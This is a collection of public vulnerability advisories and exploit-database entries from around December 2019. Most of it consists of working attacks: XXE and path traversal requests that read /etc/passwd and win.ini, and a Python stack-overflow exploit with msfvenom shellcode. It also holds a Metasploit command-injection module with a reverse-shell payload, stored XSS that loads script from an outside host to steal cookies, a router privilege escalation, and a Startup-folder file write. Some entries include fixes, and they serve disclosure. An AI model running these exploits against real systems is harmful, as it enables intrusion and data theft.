rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290
rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!NtQueryInformationFile+0x1071:
fffff804`1f6abb11 448bf0 mov r14d,eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc
0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc
rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0
rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!NtClose+0xffc:
fffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56
0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56
rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8
rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!NtDeviceIoControlFile+0x56:
fffff804`1f64c356 4883c468 add rsp,68h
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925
0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925
rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8
rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x7925:
fffff804`1f27a305 0f1f00 nop dword ptr [rax]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844
0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844
rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c
rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
00007fff`33aaf844 ?? ???
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
# Mitigation
Update to Lenovo Power Management driver version 1.67.17.48 or higher
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: Apache Olingo OData 4.0
# Vendor: Apache Foundation
# CSNC ID: CSNC-2009-025
# CVE ID: CVE-2019-17554
# Subject: XML External Entity Resolution (XXE)
# Risk: High
# Effect: Remotely exploitable
# Author: Archibald Haddock (advisories@compass-security.com)
# Date: 08.11.2019
#
#############################################################
Introduction:
-------------
Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1]
XML data is parsed by insecurely configured software components, which can be abused for XML External Entity attacks [2].
Affected:
---------
Vulnerable:
* Olingo OData 4.x.x to 4.6.x
Not vulnerable:
* Olingo OData 4.7.0
* The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01
Technical Description
---------------------
The XML content type entity deserializer is not configured to deny the resolution of external entities.
Requests with content type "application/xml" that trigger the deserialization of entities can be used to mount XXE attacks.
Request
======
POST /odata-server-sample/cars.svc/Cars HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8081/odata-server-sample/
Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0
Upgrade-Insecure-Requests: 1
content-type: application/xml
Content-Length: 1101
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars/$entity">
<a:id>Cars(1)</a:id>
<a:title></a:title>
<a:summary></a:summary>
<a:updated>2019-11-08T15:10:30Z</a:updated>
<a:author>
<a:name></a:name>
</a:author>
<a:link rel="edit" href="Cars(1)"></a:link>
<a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link>
<a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category>
<a:content type="application/xml">
<m:properties>
<d:Id m:type="Int16">1</d:Id>
<d:Model>F1 &xxe;</d:Model>
<d:ModelYear>2012</d:ModelYear>
<d:Price m:type="Decimal">189189.43</d:Price>
<d:Currency>EUR</d:Currency>
</m:properties>
</a:content>
</a:entry>
Response
========
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
OData-Version: 4.0
Content-Type: application/xml
Content-Length: 960
Date: Fri, 08 Nov 2019 14:22:35 GMT
Connection: close
<?xml version="1.0" encoding="UTF-8"?><a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars"><a:id>Cars(1)</a:id><a:title></a:title><a:summary></a:summary><a:updated>2019-11-08T15:22:35Z</a:updated><a:author><a:name></a:name></a:author><a:link rel="edit" href="Cars(1)"></a:link><a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link><a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category><a:content type="application/xml"><m:properties><d:Id m:type="Int16">1</d:Id><d:Model>
myuser:x:1000:1000:,,,:/home/myuser:/bin/bash
</d:Model><d:ModelYear>2012</d:ModelYear><d:Price m:type="Decimal">189189.43</d:Price><d:Currency>EUR</d:Currency></m:properties></a:content></a:entry>
Workaround / Fix:
-----------------
Configure the XML reader securely [3].
In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instantiated:
private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory();
The XMLInputFactory should be configured not to resolve external entities:
FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false);
FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
Timeline:
---------
2019-11-08: Discovery by Compass Security
2019-11-08: Initial vendor notification
2019-11-08: Initial vendor response
2019-12-04: Release of fixed Version / Patch [4]
2019-12-05: Coordinated public disclosure date
[1] https://olingo.apache.org/
[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
[3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
[4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E
Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt
# Exploit Title: FTP Commander Pro 8.03 - Local Stack Overflow
# Date: 2019-12-12
# Exploit Author: boku
# Discovered by: UN_NON
# Original DoS: FTP Commander 8.02 - Overwrite (SEH)
# Original DoS Link: https://www.exploit-db.com/exploits/37810
# Software Vendor: http://www.internet-soft.com/
# Software Link: http://www.internet-soft.com/DEMO/cftpsetup.exe
# Version: Version 8.03 & Version 8.02 (same exploit for both)
# Tested on: Windows 10 Home 1909 (64-bit; OS-build=18363.418)
# Windows 10 Education 1909 (32-bit; OS-build=18363.418)
# Windows 10 Pro 1909 (32-bit; OS-build=18363.418)
# Windows Vista Home Basic SP1 (6.0.6001 Build 6001)
# Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600
# Python Version: Python 2.7.16+
# Recreate:
# 1) Generate 'poc.txt' payload using python 2.7.x
# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
# 3) Install & Open ftpCommander v8.03 (or v8.02)
# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
# - A textbox will appear on the bottom of the right window
# 5) Paste payload from generated txt file into textbox
# 6) Click "Do it"
# - The program will crash & calculator will open
# Other Security Issue:
# - The program's default install path is: C:\\cftp\cftp.exe
#!/usr/bin/python
# Writes the PoC input to poc.txt in the current directory.
# Python 2.7 only (see the header): the two print statements are Python 2
# syntax, and `payload` concatenates str and bytes values, which Python 3
# rejects with TypeError.
blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet
try:
    # EIP offset at 4108 -- if you exceed 4112 bytes you will overwrite nSEH & SEH
    nops='CGS[BOKU]J'*100 # 1000 nops that are ASCII friendly
    # EIP jump lands at the beginning of the buffer
    # Shellcode can be up to 4108 bytes by adjusting nops & replacing shellcode
    # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
    #x86/alpha_upper succeeded with size 447 (iteration=0)
    # On Python 2.7 a b"" literal is a plain str, so it concatenates with the
    # str parts (nops, offset, eip) below; on Python 3 it is bytes.
    shellcode = b""
    shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
    shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
    shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
    shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
    shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
    shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
    shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
    shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
    shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
    shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
    shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
    shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
    shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
    shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
    shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
    shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
    shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
    shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
    shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
    shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
    shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
    shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
    shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
    shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
    shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
    shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
    shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
    shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
    shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
    shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
    shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
    shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
    shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
    shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
    shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
    shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
    shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
    shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
    shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
    shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
    shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"
    # Fill the rest of the space with B's until we are at our EIP offset
    # NOTE(review): 'str * negative' is '', so this stops padding silently
    # (with no error) once nops+shellcode is longer than 4108 bytes.
    offset = '\x42'*(4108-len(nops+shellcode))
    # The EAX register holds a Pointer to the beginning of our buffer
    # FF20 = jmp [eax]
    # !mona find -o -s '\xFF\x20'
    # 0x0041081a : '\xFF\x20' | startnull,ascii {PAGE_EXECUTE_READ} [ftpcomm.exe]
    # | ASLR: False; Rebase: False; SafeSEH: False;
    eip = '\x1a\x08\x41' # 3 byte overwrite so we can set EIP to start with 0x00
    # After jmp [eax], we land at the beginning of our buffer
    payload = nops+shellcode+offset+eip
    # NOTE(review): File is bound only here.  If any line above raises
    # (e.g. the TypeError on Python 3), the except branch below references
    # an unbound File and dies with NameError instead of printing err.
    File = 'poc.txt'
    f = open(File, 'w') # open file for write
    # Not closed if write() raises; a with-block would guarantee that.
    f.write(payload)
    f.close() # close the file
    print blt + File + " created successfully "
# Bare except: also catches KeyboardInterrupt/SystemExit and drops the
# original error, so a failure here gives no hint of its cause.
except:
    print err + File + ' failed to create'
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
POC
---------
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
# Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
# Date: 2019-12-11
# Author: Numan Türle
# Vendor Homepage: http://www.bullwark.net/
# Version : Bullwark Momentum Series Web Server JAWS/1.0
# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24
POC
---------
GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
root:ABgia2Z.lfFhA:0:0::/root:/bin/sh
# Metasploit module for the OpenNetAdmin "ping" tooltip command injection
# (EDB 47691).  Commands are sent as xajax arguments in a POST to TARGETURI
# and staged with the printf CmdStager flavour.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Module metadata and user options.  TARGETURI defaults to
  # /ona/login.php; VHOST is optional.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'OpenNetAdmin Ping Command Injection',
      'Description' => %q{
        This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.
      },
      'Author' =>
        [
          'mattpascoe', # Vulnerability discovery
          'Onur ER <onur@onurer.net>' # Metasploit module
        ],
      'References' =>
        [
          ['EDB', '47691']
        ],
      'DisclosureDate' => '2019-11-19',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => [ARCH_X86, ARCH_X64],
      'Privileged' => false,
      'Targets' =>
        [
          ['Automatic Target', {}]
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 80,
          'payload' => 'linux/x86/meterpreter/reverse_tcp'
        },
      'DefaultTarget' => 0))
    register_options(
      [
        OptString.new('VHOST', [false, 'HTTP server virtual host']),
        OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])
      ]
    )
  end

  # Fingerprints the target by opening the "about" window and reading the
  # version string from the response body.
  #
  # Returns CheckCode::Unknown (no response), ::Safe (no OpenNetAdmin
  # banner), ::Appears (version within 8.5.14..18.1.1) or ::Detected.
  def check
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'ctype' => 'application/x-www-form-urlencoded',
      'encode_params' => false,
      'vars_post' => {
        'xajax' => 'window_open',
        'xajaxargs[]' => 'app_about'
      }
    })
    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end
    unless res.body =~ /OpenNetAdmin/i
      return CheckCode::Safe
    end
    # nil when the body carries no "OpenNetAdmin - vX.Y.Z" string.
    opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first
    # NOTE(review): the argument is the quoted literal 'opennetadmin_version',
    # not the variable assigned just above.  Gem::Version rejects a
    # non-numeric string with ArgumentError, so this line raises before the
    # range test is reached; the intent reads as
    # Gem::Version.new(opennetadmin_version), guarded for the nil case.
    version = Gem::Version.new('opennetadmin_version')
    # Always true for a Gem::Version instance.
    if version
      vprint_status "OpenNetAdmin version #{version}"
    end
    if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1')
      return CheckCode::Appears
    end
    CheckCode::Detected
  end

  # Hands off to the CmdStager; each staged line is delivered through
  # execute_command below.
  def exploit
    print_status('Exploiting...')
    execute_cmdstager(flavor: :printf)
  end

  # Rewrites 'chmod +x' as 'chmod 777' (presumably because an unencoded '+'
  # decodes to a space in a form body -- encode_params is false below).
  # NOTE(review): gsub! edits cmd in place and returns nil when nothing was
  # replaced, so for a line without 'chmod +x' the interpolation in
  # execute_command yields an empty string; non-bang gsub returns the string
  # in both cases.
  def filter_bad_chars(cmd)
    cmd.gsub!(/chmod \+x/, 'chmod 777')
  end

  # Sends one command embedded in the xajaxargs[] 'ip=>;<cmd>;' argument.
  # The body is sent unencoded (encode_params false); the response is not
  # inspected and opts is unused.  Only connection errors are handled.
  def execute_command(cmd, opts = {})
    post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{filter_bad_chars(cmd)};&xajaxargs[]=ping"
    begin
      send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path),
        'ctype' => 'application/x-www-form-urlencoded',
        'encode_params' => false,
        'data' => post_data
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
# Exploit Title: D-Link DIR-615 Wireless Router - Persistent Cross-Site Scripting
# Date: 2019-12-13
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019-19742
Reproduction Steps:
1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
2. Go to Maintenance page and click on Admin on the left panel
3. Put the blind XSS payload into the name field: “><script src=https://ptguy.xss.ht></script>. The payload is saved by the server and reflected in the user page.
4. On every refresh of the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
5. For HTML injection, just put <b> Testing </b> in the username field; the username will then appear in bold on your homepage.
#Burp Intercept
POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1
username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
# Exploit Title: D-Link DIR-615 - Privilege Escalation
# Date: 2019-12-10
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019-19743
# Reproduction Steps:
# Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
# Go to the Maintenance page and click on Admin on the left panel.
# There is an option to create a user and by default, it shows only user accounts.
# Create an account (e.g. ptguy), intercept the submission in Burp Suite and change the
# `privilege` parameter from 1 (user) to 2 (admin) before forwarding it; the server applies
# the requested value without checking the caller's own privilege level.
# Privilege Escalation Post Request
POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1
username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
# Now log in with newly created root (ptguy) user. You have all administrator rights.
# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal
# Author: Patrik Lantz
# Date: 2019-12-06
# Software: Roxy Fileman
# Version: 1.4.5
# Vendor Homepage: http://www.roxyfileman.com/
# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
# CVE: CVE-2019-19731
Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134
(using custom account as application pool identity for the IIS worker process).
===========================
Description
===========================
Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on
the IIS worker process privileges.
This PoC demonstrates a crafted Windows shortcut file being uploaded and then written into a Startup folder via the traversal.
The shortcut runs at the next interactive login of whichever account's profile the traversal path lands in (the exact
relative path depends on where wwwroot sits and on the worker-process identity, as noted in step 3 below).
Proof of Concept
===========================
It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action.
The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location.
Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case
allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include
the .lnk extension.
1) Create a shortcut file
By using for example the target executable C:\Windows\System32\Calc.exe
Remove the .lnk extension and rename it to use the .dat extension.
2) Upload the file
Either upload the .dat file manually via the Roxy Fileman web interface
or programmatically using a HTTP POST request.
Details of the request:
POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------159382831523528
Content-Length: 924
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
-----------------------------159382831523528
Content-Disposition: form-data; name="action"
upload
-----------------------------159382831523528
Content-Disposition: form-data; name="method"
ajax
-----------------------------159382831523528
Content-Disposition: form-data; name="d"
/wwwroot/fileman/Uploads/test2
-----------------------------159382831523528
Content-Disposition: form-data; name="files[]"; filename="poc.dat"
Content-Type: application/octet-stream
...data omitted...
-----------------------------159382831523528--
3) Write the file to the Startup folder using the RENAMEFILE action
The new filename is set via the n parameter. The correct path can be identified by trial and error depending
on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe).
If the necessary directories do not exist, they can be created using the CREATEDIR action which also
is vulnerable to path traversal.
POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat
Workaround / Fix:
===========================
Patch main.ashx so that every path parameter used by the CREATEDIR, COPYFILE and RENAMEFILE actions is resolved to a
full path and rejected unless it stays inside the configured files root; in particular, a new name containing path
separators or ".." must never be accepted by RENAMEFILE.
Recommendations for users of Roxy Fileman:
- Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default.
Timeline
===========================
2019-12-06: Discovered the vulnerability
2019-12-06: Reported to the vendor (vendor is unresponsive)
2019-12-11: Request CVE
2019-12-13: Advisory published
Discovered By:
===========================
Patrik Lantz
# Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting
# Date: 2019-12-17
# Exploit Author: MTK
# Vendor Homepage: https://sweethawk.co/zendesk/survey-app
# Software Link: https://www.zendesk.com/apps/support/survey/
# Version: Up to v1.6
# Tested on: Zendesk - Firefox/Windows
# Software description:
# The Sweet Hawk Survey app asks customers for a 0-10 score instead of the normal good-or-bad question.
# You can get more granular satisfaction data without compromising the response rate.
# Ask an optional NPS question on the landing page. View reports and drill down into the response
# detail and go directly to the ticket. Easy to set up, just replace the survey place holder in
# your trigger or automation. Customize the landing pages for each of your brands.
# Technical Details & Impact:
# Attackers use vulnerable web pages to inject malicious code and have it stored on the web server
# for later use. The payload is automatically served to users who browse web pages and executed in
# their context. Thus, the victims do not need to click on a malicious link to run the payload.
# All they have to do is visit a vulnerable web page.
# POC
1. Open a support ticket in Zendesk and include an XSS payload in the ticket text, e.g.
<script>alert(1);</script>
2. Trigger the survey request for that ticket; the stored payload executes when the survey content is rendered (presumably in the survey landing page or the report view — not specified further by the author).
# Time line
09-19-2019 - Vulnerability discovered
09-20-2019 - Vendor contacted
12-02-2019 - Detailed report shared and full disclosure time line given with no response
12-17-2019 - Full Disclosure
